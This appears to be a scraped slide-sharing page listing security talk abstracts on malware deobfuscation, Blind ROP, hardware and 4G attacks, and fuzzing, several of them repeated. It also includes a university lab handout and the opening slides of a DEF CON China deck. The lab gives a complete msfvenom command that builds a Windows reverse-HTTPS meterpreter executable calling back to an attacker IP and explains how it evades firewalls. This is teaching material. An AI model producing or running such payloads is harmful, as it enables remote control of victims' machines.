Modern advanced malware samples are used to infect countries and they make part of the current cyber war, cyber espionage and financial attacks. Furthermore, critical actors, who write these malicious codes, try to make the static and dynamic analysis really hard by heavily obfuscating and, eventually, virtualizing codes using techniques such as CFG, call stack manipulation, dead code, opaque predicate and so on. Understanding these concepts and how they are used with virtualized packers is an advantage to learn the main anti-reversing techniques.
Therefore, to manage complex scenarios as exposed above, we are able to use frameworks such as METASM, MIASM and several dynamic static emulation techniques to make code simpler. At end, the goal is to reduce the code (most of time by using symbolic analysis), making us able to get a better understanding about the threat. Additionally, the introduction of dynamic tracing (DTrace) on Windows can help us to having a better understanding about programs and their behavior.
This presentation aims to show concepts and a practical approach on how to handle these reverse engineering challenges and techniques
We show that it is possible to write remote stack buffer overflow exploits without possessing a copy of the target binary or source code, against services that restart after a crash. This makes it possible to hack proprietary closed-binary services, or open-source servers manually compiled and installed from source where the binary remains unknown to the attacker. Traditional techniques are usually paired against a particular binary and distribution where the hacker knows the location of useful gadgets for Return Oriented Programming (ROP). Our Blind ROP (BROP) attack instead remotely finds enough ROP gadgets to perform a write system call and transfers the vulnerable binary over the network, after which an exploit can be completed using known techniques. This is accomplished by leaking a single bit of information based on whether a process crashed or not when given a particular input string. BROP requires a stack vulnerability and a service that restarts after a crash. The attack works against modern 64-bit Linux with address space layout randomization (ASLR), no-execute page protection (NX) and stack canaries.
Hardware hacking hit the news quite often in 2017, and a lot of pentesters tried to jump into the band wagon and discover the joy of hacking things rather than servers or applications. But most of them are only looking for rootz shellz and p0wning embedded Linux operating systems rather than doing what we really call "hardware hacking". In this talk, we are going to hack a Bluetooth Low Energy smartlock, from its printed circuit board to a fully working exploit, as well as its (wait for it) associated mobile application you need to install to operate this thing.
This talk is not only an introduction into the field of hardware hacking, but also a good way to dive into electronics and its specific protocols, and of course into microcontrollers and System-on-chip reverse engineering. We will cover some electronics basic knowledge as well as tools and classic methodologies when it comes at analyzing an IoT device and will provide tips and tricks based on our experience but our failures too.
Monitoring a program that monitors computer networksPVS-Studio
There exists the NetXMS project, which is a software product designed to monitor computer systems and networks. It can be used to monitor the whole IT-infrastructure, from SNMP-compatible devices to server software. And I am naturally going to monitor the code of this project with the PVS-Studio analyzer.
Aula sobre vulnerabilidades básicas ministrada na UFPR em 2018.
Introduction to Security class about classical vulnerabilities: TOCTOU, buffer overflow. Attack examples: dirtycow, return2libc, ROP.
We show that it is possible to write remote stack buffer overflow exploits without possessing a copy of the target binary or source code, against services that restart after a crash. This makes it possible to hack proprietary closed-binary services, or open-source servers manually compiled and installed from source where the binary remains unknown to the attacker. Traditional techniques are usually paired against a particular binary and distribution where the hacker knows the location of useful gadgets for Return Oriented Programming (ROP). Our Blind ROP (BROP) attack instead remotely finds enough ROP gadgets to perform a write system call and transfers the vulnerable binary over the network, after which an exploit can be completed using known techniques. This is accomplished by leaking a single bit of information based on whether a process crashed or not when given a particular input string. BROP requires a stack vulnerability and a service that restarts after a crash. The attack works against modern 64-bit Linux with address space layout randomization (ASLR), no-execute page protection (NX) and stack canaries.
Hardware hacking hit the news quite often in 2017, and a lot of pentesters tried to jump into the band wagon and discover the joy of hacking things rather than servers or applications. But most of them are only looking for rootz shellz and p0wning embedded Linux operating systems rather than doing what we really call "hardware hacking". In this talk, we are going to hack a Bluetooth Low Energy smartlock, from its printed circuit board to a fully working exploit, as well as its (wait for it) associated mobile application you need to install to operate this thing.
This talk is not only an introduction into the field of hardware hacking, but also a good way to dive into electronics and its specific protocols, and of course into microcontrollers and System-on-chip reverse engineering. We will cover some electronics basic knowledge as well as tools and classic methodologies when it comes at analyzing an IoT device and will provide tips and tricks based on our experience but our failures too.
Monitoring a program that monitors computer networksPVS-Studio
There exists the NetXMS project, which is a software product designed to monitor computer systems and networks. It can be used to monitor the whole IT-infrastructure, from SNMP-compatible devices to server software. And I am naturally going to monitor the code of this project with the PVS-Studio analyzer.
Aula sobre vulnerabilidades básicas ministrada na UFPR em 2018.
Introduction to Security class about classical vulnerabilities: TOCTOU, buffer overflow. Attack examples: dirtycow, return2libc, ROP.
Finding Resource Manipulation Bugs in Linux CodeAndrzej Wasowski
Software projects suffer from conceptually simple resource manipulation bugs, such as accessing a de-allocated memory region, or acquiring a non-reentrant lock twice. The VBDB bug database contains entries for 100 such real bugs from several open source projects, including the Linux Kernel project. These historical bugs have been collected with the aim of giving concrete well understood and documented cases to program analysis researchers, in order to boost program verification research. I will discuss simplicity and complexity of real software manipulation bugs on examples selected from VBDB. One way to reduce the amount of such bugs is to use code scanners such as Smatch or Coccinelle. Unfortunately, while very efficient, code scanners are typically based on syntactic pattern matching, which is insufficient for identifying problems that span multiple functions and involve dynamically allocated memory. We have developed a shape-and-effect inference system for C that constructs a lightweight semantic abstraction, more analyzable than syntax. A model checker is then used to match semantic bug patterns over the control flow graph decorated with the shape-and-effect abstractions. Experiments run with our prototype analyzer (EBA) shows better precision and effectiveness than with syntactic bug scanners. We have been so far able to identify 10 previously unknown locking bugs in the Linux kernel. The bugs are confirmed as real by the Kernel developers, and five of them have been already fixed in response to our reports. I will conclude, sketching how we combine EBA with another tool, RECONFIGURATOR, to massively scan Linux kernel code for bugs in atypical source configurations.
Having developed a test set, we started to research how safe it is for clients to use 4G networks of the telecommunication companies. During the research we have tested SIM-cards, 4G USB modems, radio components, IP access network. First of all we looked for the vulnerabilities that could be exploited remotely, via IP or radio network.
And the result was not late in arriving. In some cases we managed to attack SIM-cards and install a malicious Java applet there, we were able to update remotely USB modem firmware, to change password on a selfcare portal via SMS and even to get access to the internal technological network of a carrier.
Further attack evolution helped to understand how it is possible to use a simple SMS as an exploit that is able not only to compromise a USB modem and all the communications that go through it, but also to install bootkit on a box, that this modem is connected to.
Zero bugs found? Hold my beer AFL! how to improve coverage-guided fuzzing and...Maksim Shudrak
Fuzzing remains to be the most effective technique for bugs hunting in memory-unsafe programs. Last year, hundreds of security papers and talks on fuzzing have been published and dozens of them were focused on adapting or improving American Fuzzy Lop in some way. Attracting with its simplicity and efficiency, AFL is the number one choice for the vast majority of security researchers. This high popularity means that hunting for bugs with AFL or a similar tool is becoming less and less fruitful since many projects are already covered by other researchers. It is especially hard when we talk about a project participating in Google OSS-Fuzz program which utilizes AFL to generate a half-trillion test cases per day.
In practice, this means that we can not blindly rely on AFL anymore and should search for better fuzzing techniques. In order to overcome this challenge, we need to understand how AFL and similar fuzzers work and be able to use their weaknesses to find new 0days. This talk is aimed to discuss these weaknesses on real examples, explain how we can do fuzzing better and release a new open-source fuzzer called Manul.
Manul is a high-scalable coverage-guided parallel fuzzer with the ability to search for bugs in open source and black box binaries on Windows and Linux. Manul was able to find 10 0-days in 4 widely-used projects that have been extensively tested by AFL. These vulnerabilities were not found by chance, but by analyzing and addressing issues exist in AFL. Authors will show several of the most critical vulnerabilities and explain why AFL overlooked them.
This talk will be interested for experienced hackers, who are willing to improve their bug hunting capabilities, as well as for new researchers, who are making their first steps on the thorny trail of bug hunting.
"Instead of simply emulating old and slow hardware, modern hypervisors use paravirtualized devices to provide guests access to virtual hardware. Bugs in the privileged backend components can allow an attacker to break out of a guest, making them quite an interesting target.
In this talk, I'll present the results of my research on the security of these backend components and discuss Xenpwn, a hypervisor based memory access tracing tool used to discover multiple critical vulnerabilities in paravirtualized drivers of the Xen hypervisor. "
(Source: Black Hat USA 2016, Las Vegas)
Monitoring a program that monitors computer networksAndrey Karpov
There exists the NetXMS project, which is a software product designed to monitor computer systems and networks. It can be used to monitor the whole IT-infrastructure, from SNMP-compatible devices to server software. And I am naturally going to monitor the code of this project with the PVS-Studio analyzer.
Ricardo J. Rodríguez & Daniel Uroz - When ROP meets Turing: Automatic Generat...RootedCON
Return-Oriented Programming (ROP) attacks allow to hijack the control-flow execution of a vulnerable process using instructions already present in its memory map. Thus, the attacker concatenates sequences of instructions (named ROP gadgets) redirecting the control-flow execution to perform whatever computation he/she wants. Those instruction sequences, when executed, perform a well-defined operation, such as a XOR or an addition between two registers.
A Turing machine is an abstract concept to define a theoretical model able to solve any computational problem using a set of minimal operations. A system is said to be Turing-complete whether simulates a Turing machine, that is, if it is able to perform the same set of minimal operations. In particular, these operations are: to load a constant, to move values, to load and to store a value from/to memory, and to perform arithmetic and logic operations.
In this talk, we introduce a tool named EasyROP, which seeks the gadgets in a given binary file that are semantically equivalent to each of those operations. Hence, EasyROP helps to automate the development of ROP attacks. We analyzed the main dynamic-link libraries of most flavours of Windows OS, in 32 and 64-bit modes, to study the feasibility of an attack on these systems. We found that shell32.dll is the best candidate in 32-bit systems. In the case of 64-bit systems, none DLL allows to build a Turing machine. We also show the applicability with a real case study, showing how to build a ROP chain attack for CVE-2010-3333 in a Windows 7 32-bit system.
I know I promised not to touch upon the topic of 3DO console emulators anymore - well, sorry for breaking that promise. You see, I've recently had an opportunity to try such an exotic thing as a static code analyzer - PVS-Studio, to be exact. The first project I decided to try it on was, naturally, my 3DO console emulator (Phoenix Project). It was the first 32-bit console with a CD drive, dating back to the beginning of the 90-s. Dad bought it in Moscow as a present for me and my brother - and I've been fond of it since then :-). And since I've got such an opportunity, why not check all the other 3DO emulators too? Here we go...
Modern advanced malware samples are used to infect countries and they make part of the current cyber war, cyber espionage and financial attacks. Furthermore, critical actors, who write these malicious codes, try to make the static and dynamic analysis really hard by heavily virtualize and obfuscate codes using techniques such as CFG, virtualization, call stack manipulation, dead code, opaque predicate and so on. Therefore, to manage complex sceneries as exposed above, we are able to use tools such as METASM, MIASM and several emulation techniques to make code simpler. At end, the goal is to reduce the code (most of time by using symbolic analysis), making us able to get a better understanding about the threat. This presentation aims to show concepts and a practical approach on how to handle these reverse engineering problems.
MODERN TECHNIQUES TO DEOBFUSCATE AND UEFI/BIOS MALWARE -- HITB 2019 AMSTERDAMAlexandre Borges
Modern advanced malware samples are used to infect countries and they make part of the current cyber war, cyber espionage and financial attacks. Furthermore, critical actors, who write these malicious code try to make the static and dynamic analysis really hard by heavily virtualizing and obfuscating their code using techniques such as CFG, virtualization, call stack manipulation, dead code, opaque predicate and so on.
To manage these complex scenarios above, we are able to use tools such as METASM, MIASM and several emulation techniques to make the code simpler. The goal is to reduce the code (most of time by using symbolic analysis), in order to allow us a better understanding of the threaThis presentation aims to show concepts and a practical approach on how to handle obsfuscation reverse engineering challenges and threats involving BIOS/UEFI malware.
ADVANCED MALWARE THREATS -- NO HAT 2019 (BERGAMO / ITALY)Alexandre Borges
Malware threats have been impacting the way that companies make and protect their business. In general, most of companies have bought several different products to compose their infrastructure and defense line, but they are only efficient against known and simple threats. Curiously, most infections start through simple vector such as a malicious document or a simple fishing. However, the problem is another one: what kind of malware a simple dropper can download in the system? Most ring 3 threats are visible, but some of them are not. Additionally, ring 0 threats are usually very dangerous because they work under the radar, compromising deeply the system and bypassing my protection. Worse, they can make the monitoring tools useless and open the way to advanced threats like BIOS/UEFI malware. What kind of techniques are used by these threats? What protections do we have? This presentation aims to show and explain some techniques used by malware advanced threats and protections against them.
.NET MALWARE THREAT: INTERNALS AND REVERSING DEF CON USA 2019Alexandre Borges
.NET malware is well-known by security analysts, but even existing many tools such as dnSpy,.NET Reflector, de4dot and so on to make the analysis easier, most professionals have used them as a black box tool, without concerning to .NET internals, structures, MSIL coding and details. In critical cases, it is necessary have enough knowledge about internal mechanisms and to debug these .NET threats using WinDbg.
Unfortunately, .NET malware samples have become very challenger because it is so complicated to deobfuscated associated resources, as unpacking and dumping them from memory. Furthermore, most GUI debugging tools does an inside view of mechanisms such as CRL Loader, Managed Heap, Synchronization issues and Garbage Collection.
In the other side, .NET malware threats are incredibly interesting when analyzed from the MSIL instruction code, which allows to see code injections using .MSIL and attempts to compromise .NET Runtime keep being a real concern.
The purpose of this presentation is to help professionals to understand .NET malware threats and techniques by explaining concepts about .NET internals, mechanisms and few reversing techniques.
Automotive Cybersecurity: Test Like a HackerForAllSecure
Learn the techniques used by award-winning hacking teams (as well as in some real-world attacks) to identify and exploit vulnerabilities in OEM components and other automotive software. This presentation covers fundamental principles, as well as how to easily incorporate these techniques into unit or functional test stages - bringing an extra layer of protection to connected automobiles. We'll cover both how to best fit this type of testing into your pipeline to maximize speed and coverage, as well as discuss how to fit this offensive cyber security approach alongside your existing vulnerability scanning programs. Whether you're a vehicle manufacturer, integrator, or OEM - we'll discuss how to leverage hacking-based security techniques to improve protection across the supply chain and keep vehicles and drivers safer. What we'll cover:
- Successful exploits of components and vehicles - what these attacks had in common
- Layering offensive techniques atop existing security programs - what to do and what to avoid
- How to test integrated systems with multiple components from different OEMs working in tandem
- Integrating offensive testing into different stages in software development and component integration
Originally presented at https://www.automotive-iq.com/events-automotive-cybersecurity
Lab-10 Malware Creation and Denial of Service (DoS) In t.docxpauline234567
Lab-10: Malware Creation and Denial of Service (DoS)
In this lab, you will create a malware by using the Metasploit Framework. You will also launch as Denial of Service (DoS) attack.Section-1: Create a Malware
Hackers usually create malicious files for different purposes, such as command and control, defense evasion, and persistence. Pentesters create malicious files for ethical purposes, such as performing tests to check the strength of the existing countermeasures. In this lab, you will create a malicious file, and you will explore the strategies to evade the antivirus systems.
Method-1: Create a malicious file by using msfvenom
1) Log in to Kali VM on your personal computer (as set up in Lab 1).
2) Open a terminal window by clicking the terminal icon on the taskbar.
3) Type
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_https LHOST=10.10.10.10 LPORT=443 -f exe -o ethical.exe in terminal window and press enter.
You can copy this command and paste it to the terminal window of the Kali VM.
4) After running this command, a file named
ethical.exe will be created.
Notes:
msfvenom is a command-line tool within the Metasploit Framework. It is used to create payloads such as malicious executables such as shellcodes and reverse shells. This page shows the different kinds of malicious shells that can be made by using msfvenom. Have a look at the headings:
https://burmat.gitbook.io/security/hacking/msfvenom-cheetsheet. If you want to learn more about msfvenom, refer to
https://www.offensive-security.com/metasploit-unleashed/msfvenom/
LHOST (Local Host): Specifies the attacker's IP address. When the victim runs this executable, it will establish a connection to that IP address. The IP address is 10.10.10.10. It is a randomly selected IP, and you will not connect to that IP in this lab.
LPORT (Local Port): Specifies the port on which the attacker machine (10.10.10.10) will listen to incoming connections from the victim machine. In this example, when the victim runs the executable, the victim's computer will create a connection to port 443 at the attacker machine (10.10.10.10). After the victim makes a connection to the attacker machine, the attacker can start performing malicious activities, including controlling the victim machine, accessing sensitive information, deleting files, etc.
Using port 443 in this malicious activity is the safest way for hackers because it is one of the ports that is not blocked by the firewalls and routers on the Internet and LANs (Local Area Networks). It is the default port for TLS traffic. (Mostly encrypted web traffic)
Msfvenom uses reverse_https payload to create a malicious file. The malicious file will then make a reverse https connection between the victim's and the attacker's computers once initiated by the victim.
The other parameters of msfvenom are relatively more straightforward. x86 specifies t.
Finding Resource Manipulation Bugs in Linux CodeAndrzej Wasowski
Software projects suffer from conceptually simple resource manipulation bugs, such as accessing a de-allocated memory region, or acquiring a non-reentrant lock twice. The VBDB bug database contains entries for 100 such real bugs from several open source projects, including the Linux Kernel project. These historical bugs have been collected with the aim of giving concrete well understood and documented cases to program analysis researchers, in order to boost program verification research. I will discuss simplicity and complexity of real software manipulation bugs on examples selected from VBDB. One way to reduce the amount of such bugs is to use code scanners such as Smatch or Coccinelle. Unfortunately, while very efficient, code scanners are typically based on syntactic pattern matching, which is insufficient for identifying problems that span multiple functions and involve dynamically allocated memory. We have developed a shape-and-effect inference system for C that constructs a lightweight semantic abstraction, more analyzable than syntax. A model checker is then used to match semantic bug patterns over the control flow graph decorated with the shape-and-effect abstractions. Experiments run with our prototype analyzer (EBA) shows better precision and effectiveness than with syntactic bug scanners. We have been so far able to identify 10 previously unknown locking bugs in the Linux kernel. The bugs are confirmed as real by the Kernel developers, and five of them have been already fixed in response to our reports. I will conclude, sketching how we combine EBA with another tool, RECONFIGURATOR, to massively scan Linux kernel code for bugs in atypical source configurations.
Having developed a test set, we started to research how safe it is for clients to use 4G networks of the telecommunication companies. During the research we have tested SIM-cards, 4G USB modems, radio components, IP access network. First of all we looked for the vulnerabilities that could be exploited remotely, via IP or radio network.
And the result was not late in arriving. In some cases we managed to attack SIM-cards and install a malicious Java applet there, we were able to update remotely USB modem firmware, to change password on a selfcare portal via SMS and even to get access to the internal technological network of a carrier.
Further attack evolution helped to understand how it is possible to use a simple SMS as an exploit that is able not only to compromise a USB modem and all the communications that go through it, but also to install bootkit on a box, that this modem is connected to.
Zero bugs found? Hold my beer AFL! how to improve coverage-guided fuzzing and...Maksim Shudrak
Fuzzing remains to be the most effective technique for bugs hunting in memory-unsafe programs. Last year, hundreds of security papers and talks on fuzzing have been published and dozens of them were focused on adapting or improving American Fuzzy Lop in some way. Attracting with its simplicity and efficiency, AFL is the number one choice for the vast majority of security researchers. This high popularity means that hunting for bugs with AFL or a similar tool is becoming less and less fruitful since many projects are already covered by other researchers. It is especially hard when we talk about a project participating in Google OSS-Fuzz program which utilizes AFL to generate a half-trillion test cases per day.
In practice, this means that we can not blindly rely on AFL anymore and should search for better fuzzing techniques. In order to overcome this challenge, we need to understand how AFL and similar fuzzers work and be able to use their weaknesses to find new 0days. This talk is aimed to discuss these weaknesses on real examples, explain how we can do fuzzing better and release a new open-source fuzzer called Manul.
Manul is a high-scalable coverage-guided parallel fuzzer with the ability to search for bugs in open source and black box binaries on Windows and Linux. Manul was able to find 10 0-days in 4 widely-used projects that have been extensively tested by AFL. These vulnerabilities were not found by chance, but by analyzing and addressing issues exist in AFL. Authors will show several of the most critical vulnerabilities and explain why AFL overlooked them.
This talk will be interested for experienced hackers, who are willing to improve their bug hunting capabilities, as well as for new researchers, who are making their first steps on the thorny trail of bug hunting.
"Instead of simply emulating old and slow hardware, modern hypervisors use paravirtualized devices to provide guests access to virtual hardware. Bugs in the privileged backend components can allow an attacker to break out of a guest, making them quite an interesting target.
In this talk, I'll present the results of my research on the security of these backend components and discuss Xenpwn, a hypervisor based memory access tracing tool used to discover multiple critical vulnerabilities in paravirtualized drivers of the Xen hypervisor. "
(Source: Black Hat USA 2016, Las Vegas)
Monitoring a program that monitors computer networksAndrey Karpov
There exists the NetXMS project, which is a software product designed to monitor computer systems and networks. It can be used to monitor the whole IT-infrastructure, from SNMP-compatible devices to server software. And I am naturally going to monitor the code of this project with the PVS-Studio analyzer.
Ricardo J. Rodríguez & Daniel Uroz - When ROP meets Turing: Automatic Generat...RootedCON
Return-Oriented Programming (ROP) attacks allow to hijack the control-flow execution of a vulnerable process using instructions already present in its memory map. Thus, the attacker concatenates sequences of instructions (named ROP gadgets) redirecting the control-flow execution to perform whatever computation he/she wants. Those instruction sequences, when executed, perform a well-defined operation, such as a XOR or an addition between two registers.
A Turing machine is an abstract concept to define a theoretical model able to solve any computational problem using a set of minimal operations. A system is said to be Turing-complete whether simulates a Turing machine, that is, if it is able to perform the same set of minimal operations. In particular, these operations are: to load a constant, to move values, to load and to store a value from/to memory, and to perform arithmetic and logic operations.
In this talk, we introduce a tool named EasyROP, which seeks the gadgets in a given binary file that are semantically equivalent to each of those operations. Hence, EasyROP helps to automate the development of ROP attacks. We analyzed the main dynamic-link libraries of most flavours of Windows OS, in 32 and 64-bit modes, to study the feasibility of an attack on these systems. We found that shell32.dll is the best candidate in 32-bit systems. In the case of 64-bit systems, none DLL allows to build a Turing machine. We also show the applicability with a real case study, showing how to build a ROP chain attack for CVE-2010-3333 in a Windows 7 32-bit system.
I know I promised not to touch upon the topic of 3DO console emulators anymore - well, sorry for breaking that promise. You see, I've recently had an opportunity to try such an exotic thing as a static code analyzer - PVS-Studio, to be exact. The first project I decided to try it on was, naturally, my 3DO console emulator (Phoenix Project). It was the first 32-bit console with a CD drive, dating back to the beginning of the 90-s. Dad bought it in Moscow as a present for me and my brother - and I've been fond of it since then :-). And since I've got such an opportunity, why not check all the other 3DO emulators too? Here we go...
Modern advanced malware samples are used to infect countries and they make part of the current cyber war, cyber espionage and financial attacks. Furthermore, critical actors, who write these malicious codes, try to make the static and dynamic analysis really hard by heavily virtualize and obfuscate codes using techniques such as CFG, virtualization, call stack manipulation, dead code, opaque predicate and so on. Therefore, to manage complex sceneries as exposed above, we are able to use tools such as METASM, MIASM and several emulation techniques to make code simpler. At end, the goal is to reduce the code (most of time by using symbolic analysis), making us able to get a better understanding about the threat. This presentation aims to show concepts and a practical approach on how to handle these reverse engineering problems.
MODERN TECHNIQUES TO DEOBFUSCATE AND UEFI/BIOS MALWARE -- HITB 2019 AMSTERDAMAlexandre Borges
Modern advanced malware samples are used to infect countries and they make part of the current cyber war, cyber espionage and financial attacks. Furthermore, critical actors, who write these malicious code try to make the static and dynamic analysis really hard by heavily virtualizing and obfuscating their code using techniques such as CFG, virtualization, call stack manipulation, dead code, opaque predicate and so on.
To manage these complex scenarios above, we are able to use tools such as METASM, MIASM and several emulation techniques to make the code simpler. The goal is to reduce the code (most of time by using symbolic analysis), in order to allow us a better understanding of the threaThis presentation aims to show concepts and a practical approach on how to handle obsfuscation reverse engineering challenges and threats involving BIOS/UEFI malware.
ADVANCED MALWARE THREATS -- NO HAT 2019 (BERGAMO / ITALY)Alexandre Borges
Malware threats have been impacting the way that companies make and protect their business. In general, most of companies have bought several different products to compose their infrastructure and defense line, but they are only efficient against known and simple threats. Curiously, most infections start through simple vector such as a malicious document or a simple fishing. However, the problem is another one: what kind of malware a simple dropper can download in the system? Most ring 3 threats are visible, but some of them are not. Additionally, ring 0 threats are usually very dangerous because they work under the radar, compromising deeply the system and bypassing my protection. Worse, they can make the monitoring tools useless and open the way to advanced threats like BIOS/UEFI malware. What kind of techniques are used by these threats? What protections do we have? This presentation aims to show and explain some techniques used by malware advanced threats and protections against them.
.NET MALWARE THREAT: INTERNALS AND REVERSING DEF CON USA 2019Alexandre Borges
.NET malware is well-known by security analysts, but even existing many tools such as dnSpy,.NET Reflector, de4dot and so on to make the analysis easier, most professionals have used them as a black box tool, without concerning to .NET internals, structures, MSIL coding and details. In critical cases, it is necessary have enough knowledge about internal mechanisms and to debug these .NET threats using WinDbg.
Unfortunately, .NET malware samples have become very challenger because it is so complicated to deobfuscated associated resources, as unpacking and dumping them from memory. Furthermore, most GUI debugging tools does an inside view of mechanisms such as CRL Loader, Managed Heap, Synchronization issues and Garbage Collection.
In the other side, .NET malware threats are incredibly interesting when analyzed from the MSIL instruction code, which allows to see code injections using .MSIL and attempts to compromise .NET Runtime keep being a real concern.
The purpose of this presentation is to help professionals to understand .NET malware threats and techniques by explaining concepts about .NET internals, mechanisms and few reversing techniques.
Automotive Cybersecurity: Test Like a HackerForAllSecure
Learn the techniques used by award-winning hacking teams (as well as in some real-world attacks) to identify and exploit vulnerabilities in OEM components and other automotive software. This presentation covers fundamental principles, as well as how to easily incorporate these techniques into unit or functional test stages - bringing an extra layer of protection to connected automobiles. We'll cover both how to best fit this type of testing into your pipeline to maximize speed and coverage, as well as discuss how to fit this offensive cyber security approach alongside your existing vulnerability scanning programs. Whether you're a vehicle manufacturer, integrator, or OEM - we'll discuss how to leverage hacking-based security techniques to improve protection across the supply chain and keep vehicles and drivers safer. What we'll cover:
- Successful exploits of components and vehicles - what these attacks had in common
- Layering offensive techniques atop existing security programs - what to do and what to avoid
- How to test integrated systems with multiple components from different OEMs working in tandem
- Integrating offensive testing into different stages in software development and component integration
Originally presented at https://www.automotive-iq.com/events-automotive-cybersecurity
Lab-10 Malware Creation and Denial of Service (DoS) In t.docxpauline234567
Lab-10: Malware Creation and Denial of Service (DoS)
In this lab, you will create a malware by using the Metasploit Framework. You will also launch as Denial of Service (DoS) attack.Section-1: Create a Malware
Hackers usually create malicious files for different purposes, such as command and control, defense evasion, and persistence. Pentesters create malicious files for ethical purposes, such as performing tests to check the strength of the existing countermeasures. In this lab, you will create a malicious file, and you will explore the strategies to evade the antivirus systems.
Method-1: Create a malicious file by using msfvenom
1) Log in to Kali VM on your personal computer (as set up in Lab 1).
2) Open a terminal window by clicking the terminal icon on the taskbar.
3) Type
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_https LHOST=10.10.10.10 LPORT=443 -f exe -o ethical.exe in terminal window and press enter.
You can copy this command and paste it to the terminal window of the Kali VM.
4) After running this command, a file named
ethical.exe will be created.
Notes:
msfvenom is a command-line tool within the Metasploit Framework. It is used to create payloads such as malicious executables such as shellcodes and reverse shells. This page shows the different kinds of malicious shells that can be made by using msfvenom. Have a look at the headings:
https://burmat.gitbook.io/security/hacking/msfvenom-cheetsheet. If you want to learn more about msfvenom, refer to
https://www.offensive-security.com/metasploit-unleashed/msfvenom/
LHOST (Local Host): Specifies the attacker's IP address. When the victim runs this executable, it will establish a connection to that IP address. The IP address is 10.10.10.10. It is a randomly selected IP, and you will not connect to that IP in this lab.
LPORT (Local Port): Specifies the port on which the attacker machine (10.10.10.10) will listen to incoming connections from the victim machine. In this example, when the victim runs the executable, the victim's computer will create a connection to port 443 at the attacker machine (10.10.10.10). After the victim makes a connection to the attacker machine, the attacker can start performing malicious activities, including controlling the victim machine, accessing sensitive information, deleting files, etc.
Using port 443 in this malicious activity is the safest way for hackers because it is one of the ports that is not blocked by the firewalls and routers on the Internet and LANs (Local Area Networks). It is the default port for TLS traffic. (Mostly encrypted web traffic)
Msfvenom uses reverse_https payload to create a malicious file. The malicious file will then make a reverse https connection between the victim's and the attacker's computers once initiated by the victim.
The other parameters of msfvenom are relatively more straightforward. x86 specifies t.
The Golden Ticket: Docker and High Security Microservices by Aaron GrattafioriDocker, Inc.
True microservices are more than simply bolting a REST interface on your legacy application, packing it in a Docker container and hoping for the best. Security is a key component when designing and building out any new architecture, and it must be considered from top to bottom. Umpa Lumpas might not be considered "real" microservices, but Willy Wonka still has them locked down tight!
In this talk, Aaron will briefly touch on the idea and security benefits of microservices before diving into practical and real world examples of creating a secure microservices architecture. We'll start with designing and building high security Docker containers, using and examining the latest security features in Docker (such as User Namespaces and seccomp-bpf) as well as examine some typically forgotten security principals. Aaron will end on exploring related challenges and solutions in the areas of network security, secrets management and application hardening. Finally, while this talk is geared towards Microservices, it should prove informational for all Docker users, building a PaaS or otherwise.
Slides for my lecture "Software security: vulnerabilities, exploits and
possible countermeasures" I had been giving for Samsung Electronics in Suwon, Korea (South).
ironSource's security application expert, Tomer Zait, shares his insights on engineering in the stack. Tomer, an Ort Singalovsky alumnus himself, gave this presentation to the Ort Singalovsky students on their tour of ironSource's headquarters in Tel Aviv.
Want to learn more about ironSource? Visit our website: www.ironsrc.com
Follow us on Twitter @ironSource
ironSource is looking for new talent! Check out our openings: http://bit.ly/Work-at-ironSource
Advanced Malware Analysis Training Session 2 - Botnet Analysis Part 1 securityxploded
This presentation is part of our Advanced Malware Analysis Training Series program.
For more details refer our Security Training page
http://securityxploded.com/security-training.php
Malware threats are the current and critical cyber security concern around the world. Every single day, many companies are stroke by digital threats through malicious documents or phishing, having their systems infected and causing a huge loss of money. Indeed, ransomware represent a serious problem, but they are visible threats. In the other side, rootkits and bootkits are really lethal because they infect and work under the radar, circumvent the usual defenses, take the system control and, mainly, steal valuable information. The question is: how can we fight against an enemy that we can't see? This presentation aims to explain some details about malware attack and protections.
Malware threats are the current and critical cyber security concern around the world. Every single day, many companies are stroke by digital threats through malicious documents or phishing, having their systems infected and causing a huge loss of money. Indeed, ransomware represent a serious problem, but they are visible threats. In the other side, rootkits and bootkits are really lethal because they infect and work under the radar, circumvent the usual defenses, take the system control and, mainly, steal valuable information. The question is: how can we fight against an enemy that we can't see? This presentation aims to explain some details about malware attack and protections.
0x01 - Newton's Third Law: Static vs. Dynamic AbusersOWASP Beja
f you offer a service on the web, odds are that someone will abuse it. Be it an API, a SaaS, a PaaS, or even a static website, someone somewhere will try to figure out a way to use it to their own needs. In this talk we'll compare measures that are effective against static attackers and how to battle a dynamic attacker who adapts to your counter-measures.
About the Speaker
===============
Diogo Sousa, Engineering Manager @ Canonical
An opinionated individual with an interest in cryptography and its intersection with secure software development.
Sharpen existing tools or get a new toolbox? Contemporary cluster initiatives...Orkestra
UIIN Conference, Madrid, 27-29 May 2024
James Wilson, Orkestra and Deusto Business School
Emily Wise, Lund University
Madeline Smith, The Glasgow School of Art
Have you ever wondered how search works while visiting an e-commerce site, internal website, or searching through other types of online resources? Look no further than this informative session on the ways that taxonomies help end-users navigate the internet! Hear from taxonomists and other information professionals who have first-hand experience creating and working with taxonomies that aid in navigation, search, and discovery across a range of disciplines.
Acorn Recovery: Restore IT infra within minutesIP ServerOne
Introducing Acorn Recovery as a Service, a simple, fast, and secure managed disaster recovery (DRaaS) by IP ServerOne. A DR solution that helps restore your IT infra within minutes.
This presentation by Morris Kleiner (University of Minnesota), was made during the discussion “Competition and Regulation in Professions and Occupations” held at the Working Party No. 2 on Competition and Regulation on 10 June 2024. More papers and presentations on the topic can be found out at oe.cd/crps.
This presentation was uploaded with the author’s consent.
MODERN MALWARE: OBFUSCATION AND EMULATION DEF CON CHINA 1.0 (2019)
1. 1
MODERN MALWARE:
OBFUSCATION AND EMULATION
DEF CON CHINA 1.0 (2019)
DEF CON CHINA 1.0 (2019)
by Alexandre Borges
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
2. DEF CON CHINA 1.0 (2019)
2
Malware and Security Researcher.
Speaker at DEFCON USA 2018
Speaker at HITB 2019 Amsterdam
Speaker at CONFidence Conf. 2019
Speaker at BSIDES 2018/2017/2016
Speaker at H2HC 2016/2015
Speaker at BHACK 2018
Consultant, Instructor and Speaker
on Malware Analysis, Memory
Analysis, Digital Forensics and
Rookits.
Reviewer member of the The
Journal of Digital Forensics,
Security and Law.
Referee on Digital Investigation:
The International Journal of Digital
Forensics & Incident Response
Agenda:
Introduction
Anti-reversing
METASM
MIASM
TRITON
Radare2 + MIASM
DTRACE on Windows
Anti-VM
Conclusion
ALEXANDREBORGES–MALWAREANDSECURITYRESEARCHER
4. DEF CON CHINA 1.0 (2019) 4
Every single day we handle malware samples that use several known packers such as
